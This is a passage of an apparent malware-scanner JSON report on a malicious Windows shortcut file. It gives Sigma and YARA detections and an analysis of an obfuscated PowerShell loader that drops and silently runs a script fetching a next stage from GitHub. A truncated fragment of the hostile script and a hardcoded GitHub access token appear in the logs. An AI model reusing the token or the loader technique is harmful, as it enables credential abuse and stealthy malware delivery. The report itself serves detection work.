"ScriptBlockText": "$fgbdfgdfhdfg= \"asdfdgtrBGONJOUFOAISFAwefsdjkghjkldshgjkldhsgjkdshgjkhkjfgl;kjkldsgjl;kdjgkeiorgjioejrgjdlksjglkjdsgkdsgkh\";\r\n$sdvbsdvgiiiiiiiiiiiiidesdddd = Join-Path $env:AppData \"Microsoft\";\r\n$fgbdfgdfhdfg= \"asdfdgtrBGONJOUFOAISFAwefsdjkghjkldshgjkldhsgjkdshgjkhkjfgl;kjkldsgjl;kdjgkeiorgjioejrgjdlksjglkjdsgkdsgkh\";\r\n$dhfjkg= \"sdjkghjkldshgjkldhsgjkdshgjkhkjfgl;kjkldsgjl;kdjgkeiorgjioejrgjdlksjglkjdsgkdsgkh\";\r\n$CCCCCCscscsc = \"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\"\r\n\r\n$derrhfjkg= \"sdjkdgdgd [TRUNCATED]",
"Path": "C:\\Users\\Bruno\\AppData\\Roaming\\bpvme.ps1",
"ScriptBlockId": "9041ba4e-0bf3-4ae9-a784-38d92600ccac",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
}
]
},
{
"rule_level": "low",
"rule_id": "c085cde9af85b182e783b8d7b42d66d3d0efe08696b4fe7946da3d5d1a2cd51e",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potential PowerShell Obfuscation Using Alias Cmdlets",
"rule_description": "Detects Set-Alias or New-Alias cmdlet usage, which can be used as a means to obfuscate PowerShell scripts.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "Set-Alias -Name ncim -Value New-CimInstance -Option ReadOnly, AllScope -ErrorAction SilentlyContinue",
"Path": "",
"ScriptBlockId": "717c72ce-c73f-4b99-a48b-08cb625e0db7",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
}
]
}
],
"magic": "MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Thu Dec 31 23:59:59 1969, mtime=Thu Dec 31 23:59:59 1969, atime=Thu Dec 31 23:59:59 1969, length=0, window=hidenormalshowminimized",
"crowdsourced_yara_results": [
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "Large_filesize_LNK",
"match_date": 1775023545,
"description": "Identifies shortcut (LNK) files larger than 100KB. Most goodware LNK files are smaller than 100KB.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
},
{
"ruleset_id": "000a2489bd",
"ruleset_version": "000a2489bd|48401e01afaf50f369a7c99eab393389320c7380",
"ruleset_name": "expl_lnk_zdi_can_25373",
"rule_name": "EXT_EXPL_ZTH_LNK_EXPLOIT_A",
"match_date": 1775023545,
"description": "This YARA file detects padded LNK files designed to exploit ZDI-CAN-25373.",
"author": "Peter Girnus",
"source": "https://github.com/Neo23x0/signature-base"
},
{
"ruleset_id": "000bd045c7",
"ruleset_version": "000bd045c7|1d926845269a3ac8de0431da133950390b5cced3",
"ruleset_name": "gen_susp_lnk",
"rule_name": "SUSP_LNK_Big_Link_File",
"match_date": 1775023545,
"description": "Detects a suspiciously big LNK file - maybe with embedded content",
"author": "Florian Roth (Nextron Systems)",
"source": "https://github.com/Neo23x0/signature-base"
},
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "PS_in_LNK",
"match_date": 1775023545,
"description": "Identifies PowerShell artefacts in shortcut (LNK) files.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
}
],
"sigma_analysis_stats": {
"critical": 0,
"high": 1,
"medium": 5,
"low": 5
},
"crowdsourced_ai_results": [
{
"analysis": "The LNK file contains an exceptionally long, heavily obfuscated PowerShell script embedded within its arguments string. This script attempts to decode a large array of numbers using a custom routine and a hardcoded key, save the resulting payload to `$env:appdata\\firefox.ps1`, and then execute it silently using `powershell -windowstyle hidden -ExecutionPolicy Bypass`. Although the shortcut's visible target appears to be a decoy Chrome executable path, what matters is the direct inclusion of a complex, multi-stage, stealthy execution command using a LOLBin (PowerShell) for code execution and persistence/staging. The recorded script block logs further show the dropped firefox.ps1 fetching a next stage from raw.githubusercontent.com with a hardcoded GitHub personal access token (ghp_...) in an Authorization header, writing it to the temp directory under a .pdf name and executing it. This behavior is unequivocally malicious.",
"category": "code_insight",
"verdict": "malicious",
"source": "palm",
"id": "4b0358c7e4afa54bc489a6199cca132b5f4a330892eb15bf06c0c4da9e020df2-file-palm"
}
]
}
}
}